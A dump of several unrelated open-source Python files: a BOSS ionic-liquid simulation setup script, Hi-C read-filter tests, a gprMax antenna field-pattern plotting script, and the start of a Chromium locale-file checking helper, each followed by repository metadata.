methods = ['EWALD_equil', 'NOEWALD','SF', 'SF_0.1', 'SF_0.2', 'SF_0.3','SP',
'SP_0.1','SP_0.2', 'SP_0.3', 'SFG', 'DC', 'CHARMM']
cutoffs = ['9A', '12A', '15A']
def filesToCopy(cation, anion):
infile = glob(str( infiles + '/' + cation + '+' + anion + '-'))[0]
dummy = os.path.join(datafiles,'dummy.z')
liqpar = os.path.join(datafiles,'liqpar')
liqcmd = os.path.join(datafiles,'liqcmd')
# need to handle (EMIM|BMIM|HMIM) + ACLs appropriately
liqzmat = glob(str(slvzmats + '/' + cation + '_liqzmat'))[0]
if cation == 'EMIM' or cation == 'BMIM' or cation == 'HMIM':
if anion == 'ACL4' or anion == 'ACL7':
liqzmat = glob(str(slvzmats +'/'+ cation +'-ACL_liqzmat'))[0]
cshfile = os.path.join(datafiles, 'IL_ewald.csh')
ILpar = os.path.join(datafiles, 'IL-OPLS.par')
ILsb = os.path.join(datafiles, 'IL-OPLS.sb')
return [infile, dummy, liqpar, liqcmd, liqzmat, cshfile, ILpar, ILsb]
def sed(textToReplace, replacementText, filename):
filecontents = open(filename, 'r').read()
newcontents = filecontents.replace(textToReplace, replacementText)
file = open(filename, 'w')
file.write(newcontents)
file.close()
# ICUTAS ARRAYS
icutas = {'EMIM':' 0 0 5 17 6 10 0 0',
'MMIM':' 0 0 6 11 6 10 0 0',
'BMIM':' 0 0 5 24 11 6 10 0',
'HMIM':' 0 0 5 30 21 11 6 10',
'OMIM':' 0 0 5 36 27 11 6 10',
'BPYR':' 0 0 6 23 17 6 3 0',
'EPYR':' 0 0 6 17 6 3 0 0',
'HPYR':' 0 0 6 23 17 6 3 0',
'MPYR':' 0 0 6 14 6 3 0 0',
'OPYR':' 0 0 6 23 17 6 3 0',
}
for cation in pyr_cations:
# list of anions
anions = ['BF4', 'PF6', 'Cl', 'NO3', 'TFO', 'ACL4', 'ACL7']
if cation == 'OMIM' or cation == 'OPYR':
# cations OMIM and OPYR do not have ACL anions associated with them
anions = ['BF4', 'PF6', 'Cl', 'TFO']
if cation == 'HPYR' or cation == 'OPYR':
anions = ['BF4', 'PF6', 'Cl']
for anion in anions:
for cutoff in cutoffs:
for method in methods:
pathname = os.path.join(homedir, cation, anion, cutoff, method)
print("\tBeginning %s.%s.%s.%s." %(cation, anion, cutoff,
method))
os.makedirs(pathname)
#copy all files into relevant directory
files = filesToCopy(cation,anion)
[ shutil.copy(file, pathname) for file in files ]
[ print("\t\t%s copied." % file) for file in files ]
# set the correct pathname for files
infile = os.path.join(pathname, files[0].split('/')[-1])
dummy = os.path.join(pathname, files[1].split('/')[-1])
liqpar = os.path.join(pathname, files[2].split('/')[-1])
liqcmd = os.path.join(pathname, files[3].split('/')[-1])
liqzmat = os.path.join(pathname, files[4].split('/')[-1])
cshfile = os.path.join(pathname, files[5].split('/')[-1])
ILpar = os.path.join(pathname, files[6].split('/')[-1])
ILsb = os.path.join(pathname, files[7].split('/')[-1])
# edit files accordingly
# liqpar: set icutas array and cutoff
# anions Cl, NO3, and TFO need - sign in the principal solvent
if anion == 'Cl' or anion == 'NO3' or anion == 'TFO':
sed('ANION', str(anion + '-'), liqpar)
else:
sed('ANION', anion, liqpar)
sed('icutas', icutas[cation], liqpar)
sed('XX', cutoff[:-1], liqpar)
# csh file
cshstring = str(cation +'.'+ anion +'.'+ cutoff +'.' + method)
sed('TYPE', cshstring, cshfile)
sed('LOCAL', pathname, cshfile)
sed('ANION', anion, cshfile)
# liqcmd
sed('ANION', anion, liqcmd)
# move file names to those specified in par and cmd files
# csh file
shutil.move(cshfile, os.path.join(pathname, str(cshstring +
'.csh')))
#infile
shutil.move(infile, os.path.join(pathname, 'liqin'))
# slvzmat
shutil.move(liqzmat, os.path.join(pathname, 'liqzmat'))
# EMIM, BMIM, and HMIM with ACL anions must have IL-OPLS.par params edited
if cation == 'EMIM' or cation == 'BMIM' or cation == 'HMIM':
if anion == 'ACL4' or anion == 'ACL7':
sed('2711', '2811', ILpar)
sed('2712', '2812', ILpar)
print("\tDone with %s.%s.%s.%s.\n" % (cation, anion, cutoff,
method))
if "submit" in sys.argv:
currentdir = os.getcwd()
os.chdir(pathname)
submitcmd = glob('*csh')
subprocess.call(["/home/aubbwc/scripts/runboss", submitcmd[0]])
os.chdir(currentdir)
stoptime = time()
runtime = stoptime - starttime
print("Script" + sys.argv[0] + " completed in {x:.1f} seconds.".format( x =
runtime))
sys.exit(0)
|
thebillywayne/research_utilities
|
boss/Ewald.equil.py
|
Python
|
bsd-3-clause
| 6,692
|
[
"CHARMM"
] |
2e1fc0ea36cb3e04b7c9ac40ddb298d70468c9c5979a8747c96a87b350aca542
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from tool.tb_filter import tbFilterTool
@pytest.mark.hic
def test_tb_filter_frag_01():
"""
Test case to ensure that the Hi-C read filtering tool (tbFilterTool) works
with fragment-based mapping.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_frag_02():
"""
Test case to ensure that the Hi-C read filtering tool (tbFilterTool) works
with fragment-based mapping and conservative filtering enabled.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_01():
"""
Test case to ensure that the Hi-C read filtering tool (tbFilterTool) works
with iterative mapping.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_02():
"""
Test case to ensure that the Hi-C read filtering tool (tbFilterTool) works
with iterative mapping and conservative filtering enabled.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
|
Multiscale-Genomics/mg-process-fastq
|
tests/test_tb_filter.py
|
Python
|
apache-2.0
| 9,613
|
[
"BWA"
] |
0305b3d4858435f6ba2b8116058ab05fbe5b204d76bc6afa50b72e55bcc4ece7
|
# Copyright (C) 2016, Craig Warren
#
# This module is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License.
# To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/4.0/.
#
# Please use the attribution at http://dx.doi.org/10.1016/j.sigpro.2016.04.010
import argparse
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
from gprMax.constants import c, z0
# Parse command line arguments
parser = argparse.ArgumentParser(description='Plot field patterns from a simulation with receivers positioned in circles around an antenna. This module should be used after the field pattern data has been processed and stored using the initial_save.py module.', usage='cd gprMax; python -m user_libs.antenna_patterns.plot_fields numpyfile')
parser.add_argument('numpyfile', help='name of numpy file including path')
# parser.add_argument('hertzian', help='name of numpy file including path')
args = parser.parse_args()
patterns = np.load(args.numpyfile)
# hertzian = np.load(args.hertzian)
########################################
# User configurable parameters
# Pattern type (E or H)
type = 'H'
# Relative permittivity of half-space for homogeneous materials (set to None for inhomogeneous)
epsr = 5
# Observation radii and angles
radii = np.linspace(0.1, 0.3, 20)
theta = np.linspace(3, 357, 60)
theta = np.deg2rad(np.append(theta, theta[0])) # Append start value to close circle
# Centre frequency of modelled antenna
f = 1.5e9 # GSSI 1.5GHz antenna model
# Largest dimension of antenna transmitting element
D = 0.060 # GSSI 1.5GHz antenna model
# Minimum value for plotting energy and ring steps (dB)
min = -72
step = 12
########################################
# Critical angle and velocity
if epsr:
mr = 1
z1 = np.sqrt(mr / epsr) * z0
v1 = c / np.sqrt(epsr)
thetac = np.round(np.rad2deg(np.arcsin(v1 / c)))
wavelength = v1 / f
# Print some useful information
print('Centre frequency: {} GHz'.format(f / 1e9))
if epsr:
print('Critical angle for Er {} is {} degrees'.format(epsr, thetac))
print('Wavelength: {:.3f} m'.format(wavelength))
print('Observation distance(s) from {:.3f} m ({:.1f} wavelengths) to {:.3f} m ({:.1f} wavelengths)'.format(radii[0], radii[0] / wavelength, radii[-1], radii[-1] / wavelength))
print('Theoretical boundary between reactive & radiating near-field (0.62*sqrt(D^3/wavelength)): {:.3f} m'.format(0.62 * np.sqrt((D**3) / wavelength)))
print('Theoretical boundary between radiating near-field & far-field (2*D^2/wavelength): {:.3f} m'.format((2 * D**2) / wavelength))
# Setup figure
fig = plt.figure(num=args.numpyfile, figsize=(8, 8), facecolor='w', edgecolor='w')
ax = plt.subplot(111, polar=True)
cmap = plt.cm.get_cmap('rainbow')
ax.set_prop_cycle('color', [cmap(i) for i in np.linspace(0, 1, len(radii))])
# Critical angle window and air/subsurface interface lines
if epsr:
ax.plot([0, np.deg2rad(180 - thetac)], [min, 0], color='0.7', lw=2)
ax.plot([0, np.deg2rad(180 + thetac)], [min, 0], color='0.7', lw=2)
ax.plot([np.deg2rad(270), np.deg2rad(90)], [0, 0], color='0.7', lw=2)
ax.annotate('Air', xy=(np.deg2rad(270), 0), xytext=(8, 8), textcoords='offset points')
ax.annotate('Ground', xy=(np.deg2rad(270), 0), xytext=(8, -15), textcoords='offset points')
# Plot patterns
for patt in range(0, len(radii)):
pattplot = np.append(patterns[patt, :], patterns[patt, 0]) # Append start value to close circle
pattplot = pattplot / np.max(np.max(patterns)) # Normalise, based on set of patterns
# Calculate power (ignore warning from taking a log of any zero values)
with np.errstate(divide='ignore'):
power = 10 * np.log10(pattplot)
# Replace any NaNs or Infs from zero division
power[np.invert(np.isfinite(power))] = 0
ax.plot(theta, power, label='{:.2f}m'.format(radii[patt]), marker='.', ms=6, lw=1.5)
# Add Hertzian dipole plot
# hertzplot1 = np.append(hertzian[0, :], hertzian[0, 0]) # Append start value to close circle
# hertzplot1 = hertzplot1 / np.max(np.max(hertzian))
# ax.plot(theta, 10 * np.log10(hertzplot1), label='Inf. dipole, 0.1m', color='black', ls='-.', lw=3)
# hertzplot2 = np.append(hertzian[-1, :], hertzian[-1, 0]) # Append start value to close circle
# hertzplot2 = hertzplot2 / np.max(np.max(hertzian))
# ax.plot(theta, 10 * np.log10(hertzplot2), label='Inf. dipole, 0.58m', color='black', ls='--', lw=3)
# Theta axis options
ax.set_theta_zero_location('N')
ax.set_theta_direction('clockwise')
ax.set_thetagrids(np.arange(0, 360, 30))
# Radial axis options
ax.set_rmax(0)
ax.set_rlabel_position(45)
ax.set_yticks(np.arange(min, step, step))
yticks = ax.get_yticks().tolist()
yticks[-1] = '0 dB'
ax.set_yticklabels(yticks)
# Grid and legend
ax.grid(True)
handles, existlabels = ax.get_legend_handles_labels()
leg = ax.legend([handles[0], handles[-1]], [existlabels[0], existlabels[-1]], ncol=2, loc=(0.27, -0.12), frameon=False) # Plot just first and last legend entries
# leg = ax.legend([handles[0], handles[-3], handles[-2], handles[-1]], [existlabels[0], existlabels[-3], existlabels[-2], existlabels[-1]], ncol=4, loc=(-0.13,-0.12), frameon=False)
[legobj.set_linewidth(2) for legobj in leg.legendHandles]
# Save a pdf of the plot
savename = os.path.splitext(args.numpyfile)[0] + '.pdf'
fig.savefig(savename, dpi=None, format='pdf', bbox_inches='tight', pad_inches=0.1)
# savename = os.path.splitext(args.numpyfile)[0] + '.png'
# fig.savefig(savename, dpi=150, format='png', bbox_inches='tight', pad_inches=0.1)
plt.show()
|
gprMax/gprMax
|
user_libs/antenna_patterns/plot_fields.py
|
Python
|
gpl-3.0
| 5,571
|
[
"VisIt"
] |
3e387fd1e1eb3a95167543de726591d959bf0ae7c691a4f8e296a662ffe45d57
|
#!/usr/bin/env vpython
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper script used to manage locale-related files in Chromium.
This script is used to check, and potentially fix, many locale-related files
in your Chromium workspace, such as:
- GRIT input files (.grd) and the corresponding translations (.xtb).
- BUILD.gn files listing Android localized resource string resource .xml
generated by GRIT for all supported Chrome locales. These correspond to
<output> elements that use the type="android" attribute.
The --scan-dir <dir> option can be used to check for all files under a specific
directory, and the --fix-inplace option can be used to try fixing any file
that doesn't pass the check.
This can be very handy to avoid tedious and repetitive work when adding new
translations / locales to the Chrome code base, since this script can update
said input files for you.
Important note: checks and fix may fail on some input files. For example
remoting/resources/remoting_strings.grd contains an in-line comment element
inside its <outputs> section that breaks the script. The check will fail, and
trying to fix it too, but at least the file will not be modified.
"""
from __future__ import print_function
import argparse
import json
import os
import re
import shutil
import subprocess
import sys
import unittest
# Assume this script is under build/
_SCRIPT_DIR = os.path.dirname(__file__)
_SCRIPT_NAME = os.path.join(_SCRIPT_DIR, os.path.basename(__file__))
_TOP_SRC_DIR = os.path.join(_SCRIPT_DIR, '..')
# Need to import android/gyp/util/resource_utils.py here.
sys.path.insert(0, os.path.join(_SCRIPT_DIR, 'android/gyp'))
from util import build_utils
from util import resource_utils
# This locale is the default and doesn't have translations.
_DEFAULT_LOCALE = 'en-US'
# Misc terminal codes to provide human friendly progress output.
_CONSOLE_CODE_MOVE_CURSOR_TO_COLUMN_0 = '\x1b[0G'
_CONSOLE_CODE_ERASE_LINE = '\x1b[K'
_CONSOLE_START_LINE = (
_CONSOLE_CODE_MOVE_CURSOR_TO_COLUMN_0 + _CONSOLE_CODE_ERASE_LINE)
##########################################################################
##########################################################################
#####
##### G E N E R I C H E L P E R F U N C T I O N S
#####
##########################################################################
##########################################################################
def _FixChromiumLangAttribute(lang):
"""Map XML "lang" attribute values to Chromium locale names."""
_CHROMIUM_LANG_FIXES = {
'en': 'en-US', # For now, Chromium doesn't have an 'en' locale.
'iw': 'he', # 'iw' is the obsolete form of ISO 639-1 for Hebrew
'no': 'nb', # 'no' is used by the Translation Console for Norwegian (nb).
}
return _CHROMIUM_LANG_FIXES.get(lang, lang)
def _FixTranslationConsoleLocaleName(locale):
_FIXES = {
'nb': 'no', # Norwegian.
'he': 'iw', # Hebrew
}
return _FIXES.get(locale, locale)
def _CompareLocaleLists(list_a, list_expected, list_name):
"""Compare two lists of locale names. Print errors if they differ.
Args:
list_a: First list of locales.
list_expected: Second list of locales, as expected.
list_name: Name of list printed in error messages.
Returns:
On success, return False. On error, print error messages and return True.
"""
errors = []
extra_locales = sorted(set(list_a) - set(list_expected))
if extra_locales:
errors.append('Unexpected locales: %s' % extra_locales)
missing_locales = sorted(set(list_expected) - set(list_a))
if missing_locales:
errors.append('Missing locales: %s' % missing_locales)
if errors:
print('Errors in %s definition:' % list_name)
for error in errors:
print(' %s\n' % error)
return True
return False
def _BuildIntervalList(input_list, predicate):
"""Find ranges of contiguous list items that pass a given predicate.
Args:
input_list: An input list of items of any type.
predicate: A function that takes a list item and return True if it
passes a given test.
Returns:
A list of (start_pos, end_pos) tuples, where all items in
[start_pos, end_pos) pass the predicate.
"""
result = []
size = len(input_list)
start = 0
while True:
# Find first item in list that passes the predicate.
while start < size and not predicate(input_list[start]):
start += 1
if start >= size:
return result
# Find first item in the rest of the list that does not pass the
# predicate.
end = start + 1
while end < size and predicate(input_list[end]):
end += 1
result.append((start, end))
start = end + 1
def _SortListSubRange(input_list, start, end, key_func):
"""Sort an input list's sub-range according to a specific key function.
Args:
input_list: An input list.
start: Sub-range starting position in list.
end: Sub-range limit position in list.
key_func: A function that extracts a sort key from a line.
Returns:
A copy of |input_list|, with all items in [|start|, |end|) sorted
according to |key_func|.
"""
result = input_list[:start]
inputs = []
for pos in xrange(start, end):
line = input_list[pos]
key = key_func(line)
inputs.append((key, line))
for _, line in sorted(inputs):
result.append(line)
result += input_list[end:]
return result
def _SortElementsRanges(lines, element_predicate, element_key):
"""Sort all elements of a given type in a list of lines by a given key.
Args:
lines: input lines.
element_predicate: predicate function to select elements to sort.
element_key: lambda returning a comparison key for each element that
passes the predicate.
Returns:
A new list of input lines, with lines [start..end) sorted.
"""
intervals = _BuildIntervalList(lines, element_predicate)
for start, end in intervals:
lines = _SortListSubRange(lines, start, end, element_key)
return lines
def _ProcessFile(input_file, locales, check_func, fix_func):
"""Process a given input file, potentially fixing it.
Args:
input_file: Input file path.
locales: List of Chrome locales to consider / expect.
check_func: A function called to check the input file lines with
(input_file, input_lines, locales) arguments. It must return a list of
error messages, empty on success.
fix_func: None, or a function called to fix the input file lines with
(input_file, input_lines, locales) arguments. It must return the new
list of lines for the input file, and may raise an Exception on error.
Returns:
True at the moment.
"""
print('%sProcessing %s...' % (_CONSOLE_START_LINE, input_file), end=' ')
sys.stdout.flush()
with open(input_file) as f:
input_lines = f.readlines()
errors = check_func(input_file, input_lines, locales)
if errors:
print('\n%s%s' % (_CONSOLE_START_LINE, '\n'.join(errors)))
if fix_func:
try:
input_lines = fix_func(input_file, input_lines, locales)
output = ''.join(input_lines)
with open(input_file, 'wt') as f:
f.write(output)
print('Fixed %s.' % input_file)
except Exception as e: # pylint: disable=broad-except
print('Skipped %s: %s' % (input_file, e))
return True
def _ScanDirectoriesForFiles(scan_dirs, file_predicate):
"""Scan a directory for files that match a given predicate.
Args:
scan_dir: A list of top-level directories to start scan in.
file_predicate: lambda function which is passed the file's base name
and returns True if its full path, relative to |scan_dir|, should be
passed in the result.
Returns:
A list of file full paths.
"""
result = []
for src_dir in scan_dirs:
for root, _, files in os.walk(src_dir):
result.extend(os.path.join(root, f) for f in files if file_predicate(f))
return result
def _WriteFile(file_path, file_data):
"""Write |file_data| to |file_path|."""
with open(file_path, 'w') as f:
f.write(file_data)
def _FindGnExecutable():
"""Locate the real GN executable used by this Chromium checkout.
This is needed because the depot_tools 'gn' wrapper script will look
for .gclient and other things we really don't need here.
Returns:
Path of real host GN executable from current Chromium src/ checkout.
"""
# Simply scan buildtools/*/gn and return the first one found so we don't
# have to guess the platform-specific sub-directory name (e.g. 'linux64'
# for 64-bit Linux machines).
buildtools_dir = os.path.join(_TOP_SRC_DIR, 'buildtools')
for subdir in os.listdir(buildtools_dir):
subdir_path = os.path.join(buildtools_dir, subdir)
if not os.path.isdir(subdir_path):
continue
gn_path = os.path.join(subdir_path, 'gn')
if os.path.exists(gn_path):
return gn_path
return None
def _PrettyPrintListAsLines(input_list, available_width, trailing_comma=False):
result = []
input_str = ', '.join(input_list)
while len(input_str) > available_width:
pos = input_str.rfind(',', 0, available_width)
result.append(input_str[:pos + 1])
input_str = input_str[pos + 1:].lstrip()
if trailing_comma and input_str:
input_str += ','
result.append(input_str)
return result
class _PrettyPrintListAsLinesTest(unittest.TestCase):
def test_empty_list(self):
self.assertListEqual([''], _PrettyPrintListAsLines([], 10))
def test_wrapping(self):
input_list = ['foo', 'bar', 'zoo', 'tool']
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 8),
['foo,', 'bar,', 'zoo,', 'tool'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 12), ['foo, bar,', 'zoo, tool'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 79), ['foo, bar, zoo, tool'])
def test_trailing_comma(self):
input_list = ['foo', 'bar', 'zoo', 'tool']
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 8, trailing_comma=True),
['foo,', 'bar,', 'zoo,', 'tool,'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 12, trailing_comma=True),
['foo, bar,', 'zoo, tool,'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 79, trailing_comma=True),
['foo, bar, zoo, tool,'])
##########################################################################
##########################################################################
#####
##### L O C A L E S L I S T S
#####
##########################################################################
##########################################################################
# Various list of locales that will be extracted from build/config/locales.gni
# Do not use these directly, use ChromeLocales(), AndroidAPKOmittedLocales() and
# IosUnsupportedLocales() instead to access these lists.
_INTERNAL_CHROME_LOCALES = []
_INTERNAL_ANDROID_APK_OMITTED_LOCALES = []
_INTERNAL_IOS_UNSUPPORTED_LOCALES = []
def ChromeLocales():
"""Return the list of all locales supported by Chrome."""
if not _INTERNAL_CHROME_LOCALES:
_ExtractAllChromeLocalesLists()
return _INTERNAL_CHROME_LOCALES
def AndroidAPKOmittedLocales():
"""Return the list of locales omitted from Android APKs."""
if not _INTERNAL_ANDROID_APK_OMITTED_LOCALES:
_ExtractAllChromeLocalesLists()
return _INTERNAL_ANDROID_APK_OMITTED_LOCALES
def IosUnsupportedLocales():
"""Return the list of locales that are unsupported on iOS."""
if not _INTERNAL_IOS_UNSUPPORTED_LOCALES:
_ExtractAllChromeLocalesLists()
return _INTERNAL_IOS_UNSUPPORTED_LOCALES
def _PrepareTinyGnWorkspace(work_dir, out_subdir_name='out'):
"""Populate an empty directory with a tiny set of working GN config files.
This allows us to run 'gn gen <out> --root <work_dir>' as fast as possible
to generate files containing the locales list. This takes about 300ms on
a decent machine, instead of more than 5 seconds when running the equivalent
commands from a real Chromium workspace, which requires regenerating more
than 23k targets.
Args:
work_dir: target working directory.
out_subdir_name: Name of output sub-directory.
Returns:
Full path of output directory created inside |work_dir|.
"""
# Create top-level .gn file that must point to the BUILDCONFIG.gn.
_WriteFile(os.path.join(work_dir, '.gn'),
'buildconfig = "//BUILDCONFIG.gn"\n')
# Create BUILDCONFIG.gn which must set a default toolchain. Also add
# all variables that may be used in locales.gni in a declare_args() block.
_WriteFile(
os.path.join(work_dir, 'BUILDCONFIG.gn'),
r'''set_default_toolchain("toolchain")
declare_args () {
is_ios = false
is_android = true
}
''')
# Create fake toolchain required by BUILDCONFIG.gn.
os.mkdir(os.path.join(work_dir, 'toolchain'))
_WriteFile(os.path.join(work_dir, 'toolchain', 'BUILD.gn'),
r'''toolchain("toolchain") {
tool("stamp") {
command = "touch {{output}}" # Required by action()
}
}
''')
# Create top-level BUILD.gn, GN requires at least one target to build so do
# that with a fake action which will never be invoked. Also write the locales
# to misc files in the output directory.
_WriteFile(
os.path.join(work_dir, 'BUILD.gn'), r'''import("//locales.gni")
action("create_foo") { # fake action to avoid GN complaints.
script = "//build/create_foo.py"
inputs = []
outputs = [ "$target_out_dir/$target_name" ]
}
# Write the locales lists to files in the output directory.
_filename = root_build_dir + "/foo"
write_file(_filename + ".locales", locales, "json")
write_file(_filename + ".android_apk_omitted_locales",
